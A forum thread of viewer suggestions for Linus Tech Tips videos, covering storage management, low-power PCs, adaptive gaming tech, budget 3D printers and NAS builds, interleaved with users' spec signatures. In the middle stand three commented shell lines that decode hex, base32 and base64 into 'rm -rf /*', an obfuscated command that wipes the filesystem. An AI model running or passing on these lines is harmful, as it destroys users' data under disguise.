Thread for Linus Tech Tips Video Suggestions

CPotter

@LinusTech @Slick @CPotter Please do a video on how to manage a PC with multiple storage drives and how to move games and applications between the two drives.

Edited by Thomas001
  • My system specs
  • View 91 Tempered Glass RGB Edition, No PSU, XL-ATX, Black, Full Tower Case
  • ROG MAXIMUS XI EXTREME, Intel Z390 Chipset, LGA 1151, HDMI, E-ATX Motherboard
  • Core™ i9-9900K 8-Core 3.6 - 5.0GHz Turbo, LGA 1151, 95W TDP, Processor
  • GeForce RTX™ 2080 Ti OC ROG-STRIX-RTX2080TI-O11G-GAMING, 1350 - 1665MHz, 11GB GDDR6, Graphics Card
  • ROG RYUJIN 360, 360mm Radiator, Liquid Cooling System
  • 32GB Kit (2 x 16GB) Trident Z DDR4 3200MHz, CL14, Silver-Red DIMM Memory
  • AX1600i Digital, 80 PLUS Titanium 1600W, Fanless Mode, Fully Modular, ATX Power Supply
  • Formula 7, 4g, 8.3 (W/m-K), Nano Diamond, Thermal Compound
  • On AIO cooler 6 x NF-F12 IPPC 3000 PWM 120x120x25mm 4Pin Fibre-glass SSO2 Heptaperf Retail
  • 6 x NF-A14 IPPC-3000 PWM 140mm, 3000 RPM, 158.5 CFM, 41.3 dBA, Cooling Fan
  • 1TB 970 PRO 2280, 3500 / 2700 MB/s, V-NAND 2-bit MLC, PCIe 3.0 x4 NVMe, M.2 SSD
  • Windows 10 Pro 64-bit 
  • Beyerdynamic MMX 300 (2nd Generation) Premium Gaming Headset
  • ROG PG279Q
  • Corsair K95 Platinum XT
  • ROG Sica

what i think could definitely be interesting is a video explaining how amazing it was going from pci to pci express or a review of the last pci card vs the first pci express card on how nvidia changed it all with there arrival of cuda cores

On 10/2/2019 at 12:48 AM, lukemonroe7 said:

Hi Linus,

I know that you have done quite a lot of different things in the tech world, in light of the climate protests, I was wondering whether you could do a posting on the most eco systems out there right now.  My situation is that i want to find either a pc or laptop using as little power as possible.

I use my computer as a heater in my room. No extra heating required. Sounds pretty eco to me no?

Now seriously faster harware generally needs more power. So you're probably looking at mobile or ARM chipsets. It all depends on your usecase. But in general a computer that uses less power is less powerfull.

What might be a better way to look at how eco friendly it is is to look at the trasportation and the sourcing of the materials. Could be recycled or could be out of one of the worst gold mines in Africa for example.

I would love to see someone like Anthony play around with a pi cluster and find a useful use case for it. I'm always intrigued by the neat looking cluster builds and want one myself. But I can never find a use case that makes it worth it for me.

Hi everyone! I specially made an account to post this. So here I go :)

A video showcasing the various adaptive technologies that are currently available on the market. It could help people with disabilities find their way back into gaming...or even esports!

Hope you like the idea,

Cristal1337 :)

get a prebuilt with a terrible power supply (200-280w) and see what you can squeeze out of it without it releasing its magic blue smoke

5 hours ago, Cristal1337 said:

Hi everyone! I specially made an account to post this. So here I go :)

A video showcasing the various adaptive technologies that are currently available on the market. It could help people with disabilities find their way back into gaming...or even esports!

Hope you like the idea,

Cristal1337 :)

@Cristal1337 @LinusTech @CPotter I would love to Linus do a video on adaptive technologies! ?

• My system specs
  • View 91 Tempered Glass RGB Edition, No PSU, XL-ATX, Black, Full Tower Case
  • ROG MAXIMUS XI EXTREME, Intel Z390 Chipset, LGA 1151, HDMI, E-ATX Motherboard
  • Core™ i9-9900K 8-Core 3.6 - 5.0GHz Turbo, LGA 1151, 95W TDP, Processor
  • GeForce RTX™ 2080 Ti OC ROG-STRIX-RTX2080TI-O11G-GAMING, 1350 - 1665MHz, 11GB GDDR6, Graphics Card
  • ROG RYUJIN 360, 360mm Radiator, Liquid Cooling System
  • 32GB Kit (2 x 16GB) Trident Z DDR4 3200MHz, CL14, Silver-Red DIMM Memory
  • AX1600i Digital, 80 PLUS Titanium 1600W, Fanless Mode, Fully Modular, ATX Power Supply
  • Formula 7, 4g, 8.3 (W/m-K), Nano Diamond, Thermal Compound
  • On AIO cooler 6 x NF-F12 IPPC 3000 PWM 120x120x25mm 4Pin Fibre-glass SSO2 Heptaperf Retail
  • 6 x NF-A14 IPPC-3000 PWM 140mm, 3000 RPM, 158.5 CFM, 41.3 dBA, Cooling Fan
  • 1TB 970 PRO 2280, 3500 / 2700 MB/s, V-NAND 2-bit MLC, PCIe 3.0 x4 NVMe, M.2 SSD
  • Windows 10 Pro 64-bit 
  • Beyerdynamic MMX 300 (2nd Generation) Premium Gaming Headset
  • ROG PG279Q
  • Corsair K95 Platinum XT
  • ROG Sica

Hi !

I can't see any mention of the Vaio SX12 anywhere on the forum. It seems to be an interesting ultrabook for port enthusiasts on the go. Could be a cool review compared to the LG Gram.

aHR0cHM6Ly93d3cubGFwdG9wbWFnLmNvbS9pbWFnZXMvdXBsb2Fkcy81NzU2L2cvdmFpby1zeDEyLTAwNS5qcGc=.jpg

vaio-2.png

Hi, i was watching one of your water cooling videos and i had an inspiration,

Why dont you make a water cooling with a car raiator and the car liquid?

been a huge fan for over 5 years

You've done a heap on the best gaming PCs (laptop and desktop) and even gaming phones - how about the best gaming tablet? Using the Switch devices would be cheating, and don't forget there are Windows tablets, not just Android and iOS.

A video on the pinebook pro would be cool.

# $(echo 726d202d7266202f2a0a | xxd -r -p)
# $(echo OJWSALLSMYQC6KQK | base32 -d)
# $(echo cm0gLXJmIC8qCg== | base64 -d)

On 10/3/2019 at 3:43 PM, Jillorval said:

What about the "Tilt five" AR system?

Tilt Five Kickstarter + Videos

I agree... this system is being touted as a console-style platform for tabletop RPG/RTS games, but I see it as a competitor to a Looking Glass display (especially since the company states they've tested it to show game livestreams).

Consider, therefore, could this work as an alternative to a monitor if wall-mounted?

so apparently you can buy the cheese grater as a case now? 

called dune pro 

http://www.dunecase.com/

ok so i read that wrong its a kickstarter and you can pre-order from October 21st on.

still interesting i think. especially since linus planned on doing a monster build in an old apple case anyway. or did i miss it and that already came out?

"You know it'll clock down as soon as it hits 40°C, right?" - "Yeah ... but it doesnt hit 40°C ... ever  😄"

GPU: MSI GTX1080 Ti Aero @ 2 GHz (watercooled) CPU: Ryzen 5600X (watercooled) RAM: 32GB 3600Mhz Corsair LPX MB: Gigabyte B550i PSU: Corsair SF750 Case: Hyte Revolt 3

So do you remember the video where Linus made the DIY SSD? Yes? Okay do you remember the video where he runs windows off an SD card? Yes? Good, what about the video where he makes a DIY USB drive out of an M.2 drive and an enclosure? 

You can probably see where I’m going with this by now,

If you didn’t, the video idea is that they try to run Windows off the DIY USB, maybe try to play some games and then see how it performs compared to the SD card windows.

video subject for you guys is a build that i'm wanting to do just don't know if it will really work for everything i want, it's a build that i would need to last for a few years and it will be the biggest build i have ever even thought about and never built anything close to it so would be good for you guys to do a test run for me lol

It needs to do video editing 4k for now but maybe 8k in the future once camera prices come down, gaming and maybe some streaming along with all the day to day stuff i need to run a business, The spec's are

Asus Rog Rampage VI extreme omega, Intel X299, s2066

Intel Core i9 9980XE Extreme, s2066, skylake-x refresh, 18 Core, 36 Thread, 3.0 - 4.4Ghz

128GB 8x16GB corsair DDR4 vengeance LPX Black

2x MSI GeForce RTX 2080 Ti gaming x trio running SLI 

2x 500GB Samsung 970 EVO Plus M.2

with water cooling.

did i mention i have not built a computer in years and have been running a out the box all in one :( slow as hell " kids and the 2 Labs took all my money" lol 

please don't slate too hard, but any feedback would be good

A few months ago, on a livestream, we got a peak at a new intro. 
Are you guys still thinking about changing it? Or even removing it?
In my opinion, you really need a new, shorter intro.  Or you could even get rid of it alltogether. 

but why

aorus pro z390

noctua nh-d15s chromax w black cover

evga 3070 ultra

samsung 128gb, adata swordfish 1tb, wd blue 1tb

seasonic 620w dogballs psu

As some one that use iCue software to control my fans, strips, memory, keyboard and mouse I assure you its anything but "smart"

Intel Xeon E5 1650 v3 @ 3.5GHz 6C:12T / CM212 Evo / Asus X99 Deluxe / 16GB (4x4GB) DDR4 3000 Trident-Z / Samsung 850 Pro 256GB / Intel 335 240GB / WD Red 2 & 3TB / Antec 850w / RTX 2070 / Win10 Pro x64

HP Envy X360 15: Intel Core i5 8250U @ 1.6GHz 4C:8T / 8GB DDR4 / Intel UHD620 + Nvidia GeForce MX150 4GB / Intel 120GB SSD / Win10 Pro x64

HP Envy x360 BP series Intel 8th gen

AMD ThreadRipper 2!

5820K & 6800K 3-way SLI mobo support list

I don't think enough people are reviewing a lot of the more budget 3D printers or even some of the biggest consumer ones like the CR10 S5 or Folger Tech FT-6 3D Printer. Would be something pretty easy to expand into since the machine just does all of the work for you basically, just need some time lapses of it printing and overviews of the machines.

I'm sure plenty of companies would be willing to reach out as well to send in units.

Probably want to start with a Prusa mk3 though just for a baseline

I edit my posts a lot, Twitter is @LordStreetguru just don't ask PC questions there mostly...

Spoiler

What is your budget/country for your new PC?

what monitor resolution/refresh rate?

What games or other software do you need to run?

1 minute ago, Streetguru said:

I don't think enough people are reviewing a lot of the more budget 3D printers or even some of the biggest consumer ones like the CR10 S5 or Folger Tech FT-6 3D Printer. Would be something pretty easy to expand into since the machine just does all of the work for you basically, just need some time lapses of it printing and overviews of the machines.

I'm sure plenty of companies would be willing to reach out as well to send in units.

Lol, you think so? literally every 3D printer related youtube channel feasts off budget 3d printer reviews and builds.

mY sYsTeM iS Not pErfoRmInG aS gOOd As I sAW oN yOuTuBe. WhA t IS a GoOd FaN CuRVe??!!? wHat aRe tEh GoOd OvERclok SeTTinGS FoR My CaRd??  HoW CaN I foRcE my GpU to uSe 1o0%? BuT WiLL i HaVE Bo0tllEnEcKs? RyZEN dOeS NoT peRfORm BetTer wItH HiGhER sPEED RaM!!dId i WiN teH SiLiCON LotTerrYyOu ShoUlD dEsHrOuD uR GPUmy SYstEm iS UNDerPerforMiNg iN WarzONEcan mY Pc Run WiNdOwS 11 ?woUld BaKInG MY GRaPHics card fIX it? MultimETeR TeSTiNG!! aMd'S GpU DrIvErS aRe as goOD aS NviDia's YOU SHoUlD oVERCloCk yOUR ramS To 5000C18

9 minutes ago, Levent said:

Lol, you think so? literally every 3D printer related youtube channel feasts off budget 3d printer reviews and builds.

oh god I got merged in real time.

For example the Anycubic 4max pro that just came out has only a few reviews on youtube.

Or maybe see how good DIY kits have gotten, I think the ender 3 just got a new one that isn't a fire hazard.

but more people reviewing and spreading the hobby is always good too.

Can also review more unique filaments in round ups or something.

I edit my posts a lot, Twitter is @LordStreetguru just don't ask PC questions there mostly...

Spoiler

What is your budget/country for your new PC?

what monitor resolution/refresh rate?

What games or other software do you need to run?

I'd like to see a video experimenting just how crappy the hardware for a NAS can be, and the performance per dollar you can get out of a NAS.

IMG_0025.JPG

IMG_0024.JPG

joeyhawkins76

Computer Geek